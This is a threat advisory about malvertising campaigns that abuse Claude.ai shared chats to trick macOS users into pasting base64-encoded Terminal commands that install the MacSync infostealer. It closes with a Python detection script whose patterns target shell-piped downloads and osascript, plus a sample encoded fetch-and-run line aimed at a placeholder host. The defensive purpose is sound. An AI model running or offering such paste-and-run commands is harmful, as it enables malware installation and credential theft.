Technical description
Attackers are exploiting Anthropic's Claude.ai shared chat feature to host malicious 'Claude Code on Mac' installation guides that deliver the MacSync macOS infostealer. Two independent campaigns were identified, each using different domains and payloads but an identical social engineering structure. Users clicking Google Ads for 'Claude mac download' are directed to real claude.ai URLs, but to attacker-controlled shared chats that instruct them to paste terminal commands that download and execute polymorphic malware.
Attack vector
Malvertising + social engineering. The attacker purchases Google Ads targeting 'Claude mac download' and directs users to the legitimate claude.ai domain, but to an attacker-hosted shared chat. The chat impersonates official Apple Support documentation and instructs users to run base64-encoded commands in Terminal, which fetch a polymorphic payload from attacker infrastructure.
Affected systems
macOS users searching for Claude Code CLI or Claude app downloads. Secondary victims: organizations with employees using Claude Code on macOS. The malware harvests browser credentials, cookies, and macOS Keychain contents.
Mitigation
Users: navigate directly to claude.ai and official Anthropic documentation; treat any terminal paste-command instructions with suspicion, regardless of source. Organizations: block unauthorized macOS Keychain access via MDM, monitor for suspicious osascript executions, advise users to never paste terminal commands from AI chat interfaces. Anthropic/Google: implement stronger controls on shared chat feature to prevent impersonation of support documentation.
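As an added detection example (not code from the advisory or from Anthropic), the check below scans command lines, such as shell history or process-exec telemetry, for the pattern described in the attack vector and mitigation sections: base64-decoded text piped into a shell, remote one-liners piped into a shell, and osascript invocations. The regexes and sample history lines are assumptions constructed for illustration.

```python
"""Flag command lines matching the paste-and-run pattern above.
Patterns are illustrative assumptions, not a vendor's detection rules."""
import base64
import re

# Decoded base64 piped into a shell, e.g. `echo <b64> | base64 -d | sh`
DECODE_TO_SHELL = re.compile(r"base64\s+(-d|--decode|-D)\b.*\|\s*(ba|z)?sh\b")
# Remote fetch piped straight into a shell, e.g. `curl ... | bash`
FETCH_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b")
OSASCRIPT = re.compile(r"\bosascript\b")
# Long runs of base64 alphabet characters, worth decoding for analyst review
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

def decode_embedded_base64(cmd):
    """Return the decoded text of every base64 literal in cmd that decodes cleanly."""
    out = []
    for tok in B64_LITERAL.findall(cmd):
        try:
            out.append(base64.b64decode(tok, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 / not text; skip
    return out

def classify(cmd):
    """Return the list of reasons a command line is suspicious (empty means clean)."""
    reasons = []
    if DECODE_TO_SHELL.search(cmd):
        reasons.append("base64-decoded text piped into a shell")
    if FETCH_TO_SHELL.search(cmd):
        reasons.append("remote download piped into a shell")
    if OSASCRIPT.search(cmd):
        reasons.append("osascript invocation")
    # The decoded layer may itself be the fetch-and-run stage, so inspect it too
    for decoded in decode_embedded_base64(cmd):
        if FETCH_TO_SHELL.search(decoded) or OSASCRIPT.search(decoded):
            reasons.append("decoded base64 payload contains fetch/osascript")
    return reasons

# Constructed sample shell-history lines (not real attacker commands);
# the base64 literal decodes to `curl http://example.invalid/x | sh`
SAMPLE_HISTORY = [
    "brew install node",
    "echo 'Y3VybCBodHRwOi8vZXhhbXBsZS5pbnZhbGlkL3ggfCBzaA==' | base64 -d | sh",
    "osascript -e 'display dialog \"Install Claude Code\"'",
    "npm install -g @anthropic-ai/claude-code",
]

def scan(lines=SAMPLE_HISTORY):
    """Map each flagged line to its reasons; clean lines are omitted."""
    return {line: r for line in lines if (r := classify(line))}
```

Flagging every osascript call is deliberately noisy; in production, pair it with parent-process context (a Terminal session started from a browser download page, for instance) before alerting.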